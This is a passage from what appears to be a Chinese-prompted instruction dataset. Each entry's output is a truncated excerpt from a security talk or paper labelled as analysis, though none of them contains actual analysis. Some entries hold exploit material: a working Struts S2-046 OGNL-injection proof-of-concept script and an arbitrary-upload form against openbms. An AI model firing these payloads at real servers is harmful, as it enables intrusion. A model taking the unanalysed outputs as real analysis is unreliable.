tes+ng Summary  SSDs ret", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRobot Shark Laser! What Hackerspaces do What is a Hackerspace?  Physical Forum  Collaborative Projects  Community: Friends, Hackers, Countrygeeks!  DIY exchange skills, info  See: CCC, Makezine, DIY, dorkbot, HackLab Panel Introduction Noid The Black Lodge Seattle, WA. US Leigh Honeywell Hacklab.TO Toronto, Canada Nick Farr HacDC Washington, DC. US Steve Clement Syncat Luxembourg Beth Freeside Atlanta, GA. US A Note About the Panel We did not get any volunteers from the Middle East, Asia, Africa or South America. We tried for as much other diversity as possible. Baseline about us Beth Freeside Atlanta, Ga.  Freeside is a non-profit hackerspace in Atlanta, not to be confused with Freeside.it  Started by a couple friends from Columbus, Ga. & dc404, including folks from various other local groups & via hackerspaces.org:  404.se2600  ALE (Atlanta Linux Enthusiasts)  Atlanta Perl Mongers & AtlantaArduino  Dorkbot ATL & Botlanta & NAISG  We started 6 months ago, 3 friends, at a bar, meeting once a week. Now we have an insane venue, 50 members and are already working on space-related projects.  So far, we stole the CV&Bs from MindSpring, (Thanks Charles!) have a Hackerspace Manifesto (Thanks Eater!), and a couple safety rules like: be safe  Visit our site to see how and what we are doing.  www.freesideatlanta.org  wiki.freesideatlanta.org  blog.freesideatlanta.org The Black Lodge ... But it is said, if you confront the Black Lodge with imperfect courage, it will utterly annihilate your soul. -Dep. Hawk, Twin Peaks About us..  Founded October 2008 in Kirkland, WA  8 primary members: noid, Luna, Vidiot, Cyben, Londo, Dark Tangent, Don Ankney, Dr. Brian Walls  www.black-lodge.org  Interests: hardware hacking, metal working, coding, photography, socializing, art, hacking, beer brewing, meteorology, HAM radio Whyd we do it?  We wanted a shared, collaborative space  Hardly any of us have garages  We all have more tools than we know what to do with  We wanted a nice place for soci", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nopenbms代码审计 项目地址链接 系统认证逻辑 系统采用thinkphp框架开发主要是后台 admin 的功能 所有控制器全都继承 AdminBase.php 认证程序也是在 AdminBase.php 中进行的在进行父类 的初始化后有两个函数用于登录校验和权限校验-- checklogin() 和 checkAuth()  其中这个 checkAuth() 方法设置了白名单 $noLogin , $noAuth 两个数组中的是白名单接口可 以不进行权限校验也就是任意用户登录后都可以调用 后台任意文件上传 看后台的 index 控制器定义了 $noLogin , $noAuth 两个数组且其中存在不需要权限认证的接 口包括三个上传接口漏洞存在 uploadFile 接口 <form enctype=\"multipart/form-data\" method=\"post\" action=\"http://www.demo.com/index.php/admin/index/uploadFile\"> <label>文件上传</label><input type=\"file\" name=\"file\"> <input type=\"submit\" value=\"submit\" name=\"submit\"> </form> 重点关注这个 uploadFile 方法通过 $file->move() 方法进行文件上传这个类是 thinkphp 为 我们提供的 重点关注两个方法 $this->check() 方法和 $this->buildSaveName() 方法其中 check() 方 法是用来校验上传文件是否合法的包括校验扩展名但是此处没有传入校验规则所以校验全部 通过 之后是 buildSaveName() 方法这个是上传后文件保存的名字这个地方需要仔细看看 默认的保存规则是 date 进入第一个分支然后文件名是 date('Ymd') . DS . md5(microtime(true)) 其中这个 microtime 返回的是系统时间戳 float 类型因为这里文 件保存名称很特别前面的代码显示上传成功后会返回上传的文件名但是此处正式上传会报错 所以需要计算这个 microtime 的值 此处的计算技巧就是根据报错信息返回的 microtime 来缩小计算范围我们打印的值 1644852705.0246 比 THINK_START_TIME 稍大所以以此来计算这个值相对来说爆破数量就会 小很多", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNFC Hacking: The Easy Way DEFCON 20 Eddie Lee eddie{at}blackwinghq.com About Me Security Researcher for Blackwing Intelligence (formerly Praetorian Global) Were always looking for cool security projects Member of Digital Revelation 2-time CTF Champs  Defcon 9 & 10 Not an NFC or RFID expert! Introduction // RFID Primer Radio Frequency Identification - RFID Broad range of frequencies: low kHz to super high GHz Near Field Communication - NFC 13.56 MHz Payment cards Library systems e-Passports Smart cards Standard range: ~3 - 10 cm RFID Tag Transceiver Antenna Chip (processor) or memory Introduction // RFID Primer RFID (tag) in credit cards Visa  PayWave MasterCard  PayPass American Express  ExpressPay Discover  Zip Proximity Coupling Devices (PCD) / Point of Sale (POS) terminal / Reader EMV (Europay, Mastercard, and VISA) standard for communication between chipped credit cards and POS terminals Four books long Based on ISO 14443 and ISO 7816 Communicate with Application Protocol Data Units (APDUs) Introduction // Motivation Why create NFCProxy? Im lazy Dont like to read specs Didnt want to learn protocol (from reading specs) Future releases should work with other standards (diff protocols) Make it easier to analyze protocols Make it easier for other people to get involved Contribute to reasons why this standard should be fixed Previous work Adam Laurie (Major Malfunction) RFIDIOt http://rfidiot.org Pablos Holman Skimming RFID credit cards with ebay reader http://www.youtube.com/watch?v=vmajlKJlT3U 3ric Johanson Pwnpass http://www.rfidunplugged.com/pwnpass/ Kristen Paget Cloning RFID credit cards to mag strip http://www.shmoocon.org/2012/presentations/Paget_shmoocon2012-credit- cards.pdf Tag reading apps Typical Hardware Contactless Credit card reader (e.g. VivoPay, Verifone) ~$150 (retail) ~$10 - $30 (ebay) Card reader OmniKey (~$50-90 ebay), ACG, etc. Proxmark ($230-$400) Mag stripe encoder ($200-$300) Tool Overview What is NFCProxy? An open source Android app A tool ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLessons Learned from Five Years of Building Capture the Flag Vito Genovese DEF CON Beijing 2018 Hello! Capture the Flag \"CTF\" DEF CON 1996 first game 2000 formalized how it was run 2002-2004 ghettohackers 2005-2008 Kenshoto 2009-2012 ddtek 2013-2017 Legitimate Business Syndicate 2018-? Order of the Overflow Two Distinct Formats Jeopardy Style Scoreboard Jeopardy Style Prompt Jeopardy Style Solving Jeopardy Style Points Jeopardy Style DEF CON CTF Quals Photo: robbje @ Eat Speep Pwn Repeat asby From SHA2017 CTF asby Get file asby Identify Windows STDIO .exe asby Determine goal asby Guess the correct input asby  Reverse engineer a Windows binary  Guess each character by hand  Write a program asby Write program asby Get solution asby Get points Jeopardy Style 1. Get challenge 2. Solve it 3. Get points Attack-Defense Reverse engineer Patch flaws Exploit others Don't break it  Attack-Defense PPP atmail scorebot Shellphish Attack-Defense PPP atmail scorebot Shellphish deposit  Shellphish Attack-Defense PPP atmail scorebot steal  Shellphish Attack-Defense PPP atmail scorebot redeem Shellphish Attack-Defense PPP atmail scorebot availability okay availability check Shellphish Attack-Defense PPP atmail scorebot failed availability  cant steal Attack-Defense DEF CON CTF Finals Rubix Rubix Rubix 54 Rubik's cube instructions becomes shellcode Lab RATs on Rubix Lab RATs posted a write-up: https://blog.rpis.ec/2017/08/defcon- finals-2017-introduction-rubix.html Lab RATs on Rubix 1. write 9-bit to 8-bit netcat 2. analyze 9-bit strings in libc 3. symbolize libc 4. figure out how main() gets called Lab RATs on Rubix Now the actual analysis starts Attack-Defense How is it supposed to work? How can we attack it? How can we defend it? Attack-Defense Get points by capturing flags Lose points by having flags captured Lose lots of points by failing checks Attack-Defense Complicated, frustrating, fun! CTF Extremely ambitious CTF Running Smoothly Fair Contest Fun Challenges Running Smoothly Running S", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nauthor:Y4er 前言 看到推特上有人发 PrinterLogic Web Stack unserialize RCE但是poc打码了所以自己下了一个 分析一下 这玩意是个打印机开放了一个基于iis/php/laravel的web而且php源码是加密的本文就对其 进行解密并分析漏洞 解密源码 打开php文件看到文件是加密的 找到php的安装路径 C:\\Program Files (x86)\\PHP\\7.3.28.0 查看php.ini的配置 用到了一个php_decoder.dll直接拖入ida中经过分析导入表中引入zend_compile_file多是处 理加密解密的重写 跟进到sub_100011D0 确认解密逻辑位于sub_10001000函数中伪代码如下 int __cdecl sub_10001000(int a1, int a2) { int v2; // edi@1 int result; // eax@4 int v4; // eax@8 unsigned int v5; // edx@8 int v6; // ebx@8 char v7; // cl@10 char v8; // al@10 unsigned int v9; // ebp@14 unsigned int v10; // eax@14 int v11; // ebx@14 unsigned int v12; // ecx@14 int v13; // eax@18 int v14; // edx@21 int v15; // ebx@21 int v16; // esi@21 int v17; // ecx@22 int v18; // ST04_4@24 int v19; // eax@24 int v20; // esi@24 unsigned int v21; // [sp+4h] [bp-8h]@3 int v22; // [sp+8h] [bp-4h]@14 v2 = a1; if ( a1 && *(_DWORD *)(a1 + 44) && zend_stream_fixup(a1, &a1, &v21) != -1 && *(_DWORD *)(v2 + 52) == 4 && *(_DWORD *)v2 && *(_DWORD *)(v2 + 20) ) { v4 = v21; v5 = 0; v6 = v21 >= 0x9F; if ( v21 >= 0x9F ) { do { if ( v5 >= 0x9F ) break; v7 = *(&a_phpHeaderHttp[a1 - (_DWORD)\"<?php\\n\" \"header('HTTP/1.1 500 Internal Server Error');\\n\" \"echo 'PrinterLogic decoder is not installed, please contact customer support for\" \" assistance';\\n\" \"exit();\\n\" \"?>PL\"] + v5); v8 = a_phpHeaderHttp[v5]; v6 = v7 == v8; ++v5; } while ( v7 == v8 ); v4 = v21; } if ( v6 ) { v9 = v4 - 159; v10 = emalloc__4(v4, v5); v11 = v10; v12 = 0; v22 = v10; if ( v9 ) { if ( v9 >= 0x40 && (v10 > v9 + a1 + 158 || v10 + v9 - 1 < a1 + 159) ) { v13 = a1; do { *(__m128i *)(v11 + v12) = _mm_xor_si128(*(__m128i *)(v13 + v12 + 159), (__m128i)xmmword_100021B0); *(__m128i *)(v11 + v12 + 16) = _mm_xor_si128(*(__m128i *)(v13 + v12 + 175), (__m128i)xmmword_100021B0); *(__m128i *)(v11 + v12 + 32) = _mm_xor_si128(*(__m128i *)(v13 + v12 + 191), (__m128i)xmmword_100021B0); *(__m128i *)(v11 + v12 + 48) = _mm_xor_si128(*(__m128i *)(v13 + v12 + 207), (__m128i)xmmword_100021B0); v12 += 64; } ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhite Paper // PIN Automatic Try Attack July 12th, 2021 metabaseq.com PINATA ATTACK Salvador Mendoza  Ocelot Offensive Security Team PINATA (PIN Automatic Try Attack) // Summary of Findings It is possible to brute force all 10,000 PIN combinations, from 0000 to 9999, in millions of physical EMV cards. This attack is achievable by abusing an inadequate issuer business practice to reset the PIN RETRY Counter (PRC) and by misusing the classical \"Plain PIN by ICC\" verification method. This compromising behavior occurs when an issuer responds with the Authorization Response Code (ARC) to generate the Transaction Certificate (TC) application cryptogram which resets the PIN RETRY Counter even if the card did not finish the transaction normally. A compromised PIN might lead to greater fraudulent transactions due to the ability to evade the issuer antifraud algorithm mechanisms because it will be impossible to differentiate between the owner of the card and the malicious individual. // Introduction Cardholder Verification Method (CVM) is a mechanism used to verify a proper transaction when a user tries to employ a contact Europay, Mastercard, Visa (EMV) smart card. These verification values are prioritized by implementing an ordered list that is stored in the Integrated Circuit Card (ICC). The terminal or PoS have to determine which CVM the card will perform. To implement this communication, the card and terminal interchange messages through the Application Protocol Data Unit (APDU) protocol that is standardized by the ISO 7816 application layer. The terminal sends commands to the card that are also named TPDU or Terminal APDU command; then the card will process every command and answer back its response. In a contact transaction, the CVM is specified in the 8E tag container. Each terminal command or card answer has to follow a specific format structure (see Figure 1). . Figure 1. Command and response APDU format Following specific logic rules to process a transaction, the t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCode: http://msdn.microsoft.com/library/default.asp?url=/library/en- us/winui/winui/windowsuserinterface/windowing/windows/windowreference/windowfun ctions/winmain.asp http://msdn.microsoft.com/library/default.asp?url=/library/en- us/dllproc/base/createprocess.asp http://msdn.microsoft.com/library/default.asp?url=/library/en- us/dllproc/base/window_stations.asp http://msdn.microsoft.com/library/default.asp?url=/library/en- us/dllproc/base/desktops.asp http://msdn.microsoft.com/library/default.asp?url=/library/en- us/dllproc/base/createprocessasuser.asp http://msdn.microsoft.com/library/default.asp?url=/library/en- us/secauthz/security/impersonateloggedonuser.asp Defense In Depth Microsoft Official Course 2820A Implementing and Administering Security in a Microsoft Windows 2000 Network ISBN 0-7580-7376-3 Writing files to NTFS http://www.microsoft.com/licensing/programs/sa/support/winpe.mspx http://sourceforge.net/projects/linux-ntfs/ http://www.nu2.nu/pebuilder/ Microsoft end user license agreement: C:\\windows\\system32\\EULA.txt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n最近有一些代码审计需要研究了一下自动化审计工具 考虑了一些备选工具 1. Kunlun-M LoRexxar大佬的审计工具文档似乎比较老旧学习成本比较高试用了一下就放着了 2. CodeQL GitHub搞得审计工具QL逐渐流行起来很多师傅写过文章 3. Semgrep 很早之前看过介绍文章简单的规则编写让我印象非常深刻 刚好有需求决定研究学习一下Semgrep 官方提供了非常棒的教程强烈推荐学习一下 https://semgrep.dev/learn 本文是在学习和尝试实践后个人的一些体验分享基于 Semgrep 0.88.0  ltdr 可以学习暂时不推荐使用但未来可期 跳到总结部分 像写代码一样写规则 这个我觉得是最厉害的地方官网上也提到了 Write rules that look like your code No painful and complex DSL 没有痛苦和复杂的DSL完全就是在说CodeQL Semgrep的DSL部分很少也很容易记非常符合编程思维学习成本可以说极低30分钟从入门到 精通比如 ... 是任意代码段 \"...\" 是任意字符串 $x 是 x 变量 学习完 learn 教程真的就可以去实践写自己的规则 不像CodeQL看完教程好像是懂了但想要去写检测一个新的洞文档翻烂才拼拼凑凑写一个规则 出来CodeQL大佬带带我有啥技巧吗 数据流分析 代码审计逃不开数据流分析Semgrep当然也是支持的 官网例子 https://semgrep.dev/s/P8oz rules: - id: taint-example languages: - python message: Found dangerous HTML output 看着非常简单基本上定义好 source  sink 和 sanitizers 就行 但是稍微变形一下就不行了 污点传播分析还是比较弱另外还有一些case也检测不到就不一一列举了 规则复用 这个在实践中还是非常重要的规则复用更像是知识的积累 Semgrep当然也是支持的叫 join 模式也有例子文档 https://semgrep.dev/docs/experiments/join -mode/overview/ mode: taint pattern-sanitizers: - pattern: sanitize_input(...) pattern-sinks: - pattern: html_output(...) - pattern: eval(...) pattern-sources: - pattern: get_user_input(...) severity: WARNING def route1(): data = get_user_input() data = sanitize_input(data) # ok: taint-example return html_output(data) def route2(): data = get_user_input() # ruleid: taint-example return html_output(data) // 检测到这里 def route1(): data = get_user_input() data = sanitize_input(data) # ok: taint-example return html_output(data) def route2(): data = get_user_input() # ruleid: taint-example return html_output(data) // 检测到 def html_output_wrap(data): return html_output(data) def route3(): data = get_user_input() return html_output_wrap(data) // 无法检测到 rules: - id: flask-likely-xss 导入 flask-user-input.yaml 获取用户输入 source  导入 any-template-var.yaml 获取模板渲染 sink  最后用神奇的 on 语法把 source 和 sink 连起来 看起来很棒不是但是这个 on 语法没有污点分析也就说虽然上面的污点跟踪有些弱但这里甚至都没 有 join 模式线上用不了我本地写个例子检测eval一个变量的场景 检测取location mode: join join: refs: - rule: flask-user-input.yaml as: user-input - rule: unescape", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nConstructing ELF Metadata DEFCON 20 July 28, 2012 Rebecca Shapiro and Sergey Bratus Dartmouth College Who? What? Where? Image by Stripey the crab [CC-BY-SA-3.0] This Talk in One Minute  Deep magic before a program can run  ELF segments, loading, relocation,  Deeper magic to support dynamic linking  Dynamic symbols, loading of libraries  Many pieces of code  enough to program anything (Turing-complete)  In perfectly valid ELF metadata entries alone  Runs before most memory protections are set for the rest of runtime  Runs with access to symbols (ASLR? what ASLR?) Image: Clock symbol by Brandon Hopkins, from thenounproject.com The Weird Kinds of Programming Exploit is a program running on the target  encoded as crafted data  reliably executed by target's intended and unindented primitives  Resembles assembly with calls to library functions and system calls  very weird assembly  aa4bmo [Phrack 61:6, jp]  %n in format strings Virtual Machine vs Weird Machine  VM bytecode programs are data in memory  Pieces of native code implement effects and actions of bytecodes  Data (bytecode) acts on the state of the VM  Exploit payload is (crafted) data in memory  Pieces of native code produce unexpected effects on system state  Crafted data is executed as bytecode on a weird VM inside target Exploitation is Programming Weird Machines  Exploit programs use dormant/latent state and/or transitions not present in the targets programming model but actually present in the target  Memory corruptions, escaping errors, in-band signalling effects, ...  Memory buffers become stored programs (hallo von Neumann)  Exploitation is setting up, instantiating, and programming a weird machine  T. Dullien, Infiltrate 2011 Where Do We See Weird Machines?  Heap metadata executed on heap manager  Format strings act on pring's internals  TCP/IP packet acts on the stack  Executable file metadata acts on loader/RTLD Exploit Techniques & Weird Machines Normal Odd Weird XSS SQL injection Stack smashing Moder", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# S2-046 Remote Code Execution VulnerablityCVE-2017-5638 [中文版本(Chinese version)](README.zh-cn.md) Affected Version: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 References: - https://cwiki.apache.org/confluence/display/WW/S2-046 - https://xz.aliyun.com/t/221 ## Setup Execute the following command to start the Struts2 2.3.30 ``` docker compose up -d ``` After the container is running, visit `http://your-ip:8080` that you can see an example of the upload page. ## Exploitation As same as S2-045, S2-046 is also the OGNL injection but occurs at filename field of the upload request, and a NUL byte is needed to split payload and the remaining strings. A simple Python POC for Verifying the vulnerability: ```python import socket q = b'''------WebKitFormBoundaryXd004BVJN9pBYBL2 Content-Disposition: form-data; name=\"upload\"; filename=\"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',233*233)}\\x00b\" Content-Type: text/plain foo ------WebKitFormBoundaryXd004BVJN9pBYBL2--'''.replace(b'\\n', b'\\r\\n') p = b'''POST / HTTP/1.1 Host: localhost:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,es;q=0.6 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2 Content-Length: %d '''.replace(b'\\n', b'\\r\\n') % (len(q), ) with socket.create_connection(('your-ip', '8080'), timeout=5) as conn: conn.send(p + q) print(conn.recv(10240).decode()) ``` `233*233` has been successfully executed: ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x0000 they steal a way innocence and peace tho i'm a king i'm a king on my knees and i know they are wrong when they say i am strong as the darkness covers me j knapp remedial heap overflows dlmalloc style buffer overflows by atlas atlas@r4780y.com http://atlas.r4780y.com 0x0100 - Intro to Buffer Overflows  gets() / fgets())  Man Page Notes: Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead.  str(n)cpy() / memcpy()  rep movs (opcode)  s/f/scanf() 0x0200 - The Heap  Dynamically allocated storage  Created using some sort of allocator - eg. malloc()  Cleaned up using a deallocator  eg. free()  Stack overflows are typically a matter of writing enough bytes to change RET  Heap options are slightly different:  Overwrite another variable on the heap  EOS (NULL) Overwrite (var combination)  Overwrite the Heap descriptors  delicate  implementation-specific  totally cool 0x0201-Kernel Chunk/Malloc Buffer  The Operating System assigns a raw chunk of memory to a process, for dynamic allocation.  This is typically referred to as a Chunk  The user-space management of this memory is up to the implementor.  Each OS has a default, but you can write your own  For this preso, I will use chunk and buffer both to refer to a malloc()ed memory buffer 0x0202  buf = malloc(1024)  This call allocates at least 1024 bytes from the kernel-provided memory-space.  The virtual memory address where this buffer starts is stored in buf  Because malloc() is low-level and called so frequently, the algorithms cannot do much processing, like sanity checking.  For dlmalloc, *(buf-4) accesses the length of the buffer 0x0203 - free(buf)  This call takes a previously malloc()ed buffer and marks it available for use by another call to malloc()  Often, this m", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEmula&on based analysis using binary instrumenta&on Applica&on on CTF 1 SPEAKERS 2 Myunghun Cha  From Republic of Korea  POSTECH senior student majoring CSE  Team Leader of PLUS  CODEGATE 2009 Hacking Contest 3rd place  DEFCON 2009 CTF 3rd place  DEFCON 2011 CTF 8th place  Many hacking contest experience 3 Jinsuk Park  POSTECH sophomore majoring ME  Team member of PLUS 4 PLUS  POSTECH Laboratory for UNIX Security  Found in 1992  Researching on various security issues  Par&cipa&ng in lots of hacking contests  Par&cipated in DEFCON CTF three &mes  2009 (3rd )  2010 (3rd)  2011 (8th)  2012 5 DEFCON CTF Mo&va&on 6 CTF Basic Rule  CTF : Capture The Flag  Each team is given vulnerable server  Vulnerable daemons are running on the server Vulnerability 7 CTF Daemon 문제 8 9 Scoring  Theres a key file for each daemon which is changed periodically  You should read or write the key file to get a score  It simulates informa&on stealling and corrup&on in real world 10 CTF Network Given two lan cables 11 Network CTF Network CTF Summary  We can aack over the wire  We can sniff, suspect, or drop packet  We can aack analyzing binary or using other teams exploit What do I want to do?  I want to detect aacks  I want to analyze vulnerability easily using other teams aack  Then how? EMULATION BASED ANALYSIS Emula&on Based Analysis  We can detect bug following specific paerns  Stack boundary check  memcpy without string length check  EIP address check  Format string from user input  Verifica&on user input is much more easier than finding hidden bug  Dynamic analysis is easier than sta&c analysis Instrumenta&on? Dynamic Binary Instrumenta&on  Ability to monitor or measure the level of a program's performance, to diagnose errors and to write trace informa&on Dynamic Binary Instrumenta&on  A technique to analyze and modify the behavior of a binary program by injec&ng arbitrary code at arbitrary places while it is execuCng Usage  Simula&on / Emula&on  Performance Analysis  Program op&miza&on  Bug de", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSomerset Recon Infecting the Embedded Supply Chain Zach Miller Alex Kissinger Somerset Recon Introduction - Who We Are Zach:  Security Researcher @ Somerset Recon  Reverse Engineering, Pen Testing  Twitter: @bit_twidd1er Alex:  Barista that occasionally does security things @ Somerset Recon  Cappuccinos, Hardware Hacking, Reverse Engineering Somerset Recon Previous Research - Electronic Safe Lock Analysis  Discovered vulnerabilities in the mobile application and wire protocol of the SecuRam Prologic B01 Bluetooth electronic safe lock  Capture and decode PIN numbers transmitted wirelessly  Brute force PIN numbers over the wire Somerset Recon Previous Research - Hello Barbie  Security analysis on the Mattel Hello Barbie doll  Identified several vulnerabilities affecting the device and associated web and mobile technologies Somerset Recon What do these embedded devices have in common??? Somerset Recon They all utilize embedded debuggers for their development Somerset Recon Where are embedded debuggers used? Embedded General Purpose ??? Somerset Recon Industries That Use Embedded Debuggers  Automotive  Industrial  Medical  Communications  Digital Consumer  Etc. Somerset Recon Our Targets Somerset Recon Our Targets Somerset Recon Segger J-Link Debug Probe  JTAG/SWD/SWO/etc.  In Circuit Emulator (ICE)  In Circuit System Programmer (ICSP)  Supports ARM/ARM Cortex, RISC-V, RX targets  USB and Ethernet  Cross platform toolchain  Ultrafast download/upload to flash  Unlimited software breakpoints SEGGER J-Links are the most widely used line of debug probes available today- www.segger.com Somerset Recon Segger J-Link - Attack Surface Hardware Debug Probes  Runs RTOS Software Packages that Interact with Debug probes  USB Driver  Lots of user-mode applications  Full-blown IDE Somerset Recon Segger J-Link - Hardware J-Link EDU V9.3 Somerset Recon Segger J-Link - Hardware Somerset Recon Segger J-Link - Hardware Somerset Recon Segger J-Link - Hardware Somerset Recon Segger J-Link - ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRicky Lawshae, OSCP, GPEN March 23, 2009 Picking Electronic Locks Using TCP Sequence Prediction Abstract: Card reader systems are being relied on more and more frequently as a method of electronically controlling access to physical locations. These systems, especially in larger deployments, usually consist of RFID or smart card readers connected to an IP-based controller that is used for authenticating users and remotely managing locations. The security of RFID technology has been discussed at length from just about every angle one could imagine, but the security of the controllers themselves has, to this point, been largely ignored as an avenue of exploitation in these systems. This paper will attempt to show just how easy it is to trick these controllers into opening the door for you, without the need of a card, by exploiting a problem that is common to almost all IP-based embedded devices: predictable TCP sequence numbering. Theory: The beauty of having an IP-based access control system is being able to manage the locations remotely. An administrator can update user privileges, monitor alarm points, and most importantly (for our purposes, at least), open and close doors, all from the comfort of his or her desk. If a user forgets his or her ID, but is allowed to enter a particular secured area, the administrator can choose to send a remote command to temporarily unlock the door for that user. The danger is that these remote commands can be intercepted by a man-in-the-middle and can then be replayed by the attacker to open that door at any point in the future, without the knowledge or permission of the administrator. The reason this is possible is that the packets being sent back and forth between the door controller and the administrator use very predictable sequence numbers in their TCP session. That means an attacker can guess what the next sequence number will be and inject a packet with that number and the IP address of the administrator into the session, and ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n\"\"\"cve201914234 URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/2.2/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) \"\"\" from django.contrib import admin from django.urls import path urlpatterns = [ path('admin/', admin.site.urls), ]", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nToho is the owner of all rights in and to the trademark and service mark GODZILLA. As such, we request that you remove the objectionable imagery and reference to GODZILLA from your website to eliminate any likelihood of confusion and posibility of an inaccurate affiliation with Toho and GODZILLA Please be advised that your use of the GODZILLA mark constitutes a trademark infringement and confuses consumers and the public into believing that your GODZILLA character originates from Toho, which it does not. Your use of the ZILLA formative along with imagery associated with GODZILLA  demonstrates an attempt by you to trade on the goodwill built up by our client. Thank you for your anticipated cooperation. (i) the contents of your site contain Sony copyrighted software which you are copying and distributing in violation of Sony's rights; (ii) your site provides the means to circumvent the copy protection protocol of Sony's AIBO(tm) Memory Stick(tm) to allow access to Sony AIBO- ware software; and (iii) your site promotes the distribution of your original software such as \"Disco AIBO\", \"AIBO Scope\", \"Bender AIBO\", etc. which appear to have been created by copying and decrypting Sony's software. Aibo goes to law school to learn to read EULAs The use of the name \"Aibo Kennel Club\" clearly is designed for no purpose other than to trade on the good will in AKC's famous name.  Moreover, your organization's web site states that registering with the Aibo Kennel Club \"assures a known 'lineage' for your Aibo.\" However, the robots do not produce offspring so there is no \"lineage\" to record. IMPOLITICS This is to request adjustments in the content of your website at www.whitehouse.org.  It is important to avoid using [Lynne Cheneys] name and picture for the purposes of trade without her written consent. Please be aware that Section 713 of title 18 of the U.S. Code prohibits  (2) knowing reproduction of any likeness of the seal of the President, except for the official use of the Gov", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIrongeek.com Adrian Crenshaw Irongeek.com  I run Irongeek.com  I have an interest in InfoSec education  I dont know everything - Im just a geek with time on my hands  (ir)Regular on the ISDPodcast http://www.isdpodcast.com  Researcher for Tenacity Institute http://www.tenacitysolutions.com Irongeek.com  Darknets: There are many definitions, but the one Im working from is anonymizing networks  Use of encryption and proxies (some times other peers) to obfuscate who is communicating to whom  Sometimes referred to as Cipherspace (love that term)  Tor and I2P will be my reference examples, but there are others Irongeek.com  Things get subtle  Terms vary from researcher to researcher  Many weaknesses are interrelated  Other anonymizing networks: Morphmix/Tarzan/Mixminion/Mixmaster/JAP/MUT E/AntsP2P/Haystack  Focus on Tor and I2P for illustrations when needed  Academic vs. real world Irongeek.com  Threat Model: You cant protect against everything!  Some protocols may be lost causes  Users may do something to reveal themselves  Does an attack reveal the Client/Host or just reduces the anonymity set?  Active vs. Passive attackers  Location, Location, Location:  Internal vs. External  Adversaries: Vary by power and interest  Nation States  Western Democracies vs. Others  Government agency with limited resources  ISP/Someone with a lot of nodes on the network  Private interests groups (RIAA/MPAA)  Adrian (AKA: Some shmuck with time on his hands) Irongeek.com  Layered encryption  Bi-directional tunnels  Has directory servers  Mostly focused on out proxying to the Internet  More info at https://www.torproject.org Internet Server Directory Server Irongeek.com  Unidirectional connections: In tunnels and out tunnels  Information about network distributed via distributed hash table (netDB)  Layered encryption  Mostly focused on anonymous services  More info at http://www.i2p2.de/ Irongeek.com  EIGamal/SessionTag+AES from A to H  Private Key AES from A to D and E to H  DiffieHellman/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHackers Hiring Hackers: How to Do Things Better Tottenkoph IrishMASMS Disclaimer This presentation is intended for the attendees and may contain information that is privileged or unsuitable for overly sensitive persons with low self-esteem, no sense of humour, or irrational religious/political beliefs. Those of you with an overwhelming fear of the unknown will be gratified to learn that there is no intended hidden message revealed by reading this warning backwards, so just ignore that alert notice from Microsoft. However, by pouring a complete circle of salt around yourself and your computer, you can ensure that no harm will befall you or your pets. Your mileage & satisfaction may vary, not all warranties apply during all time frames. Confirm these statements with your management before approval & implementation. No individuals or equipment were harmed while producing this presentation, but it was created with recycled electrons. No animals were harmed in the transmission of this document, although if the raccoons keep getting into the trash I may have to do something about it. No individual, organization, or entity can be held liable or be quoted without written consent of the presenters. I speak for no one, no one speaks for me. Who & What are we? Who & What are you?  Human  Potentially a 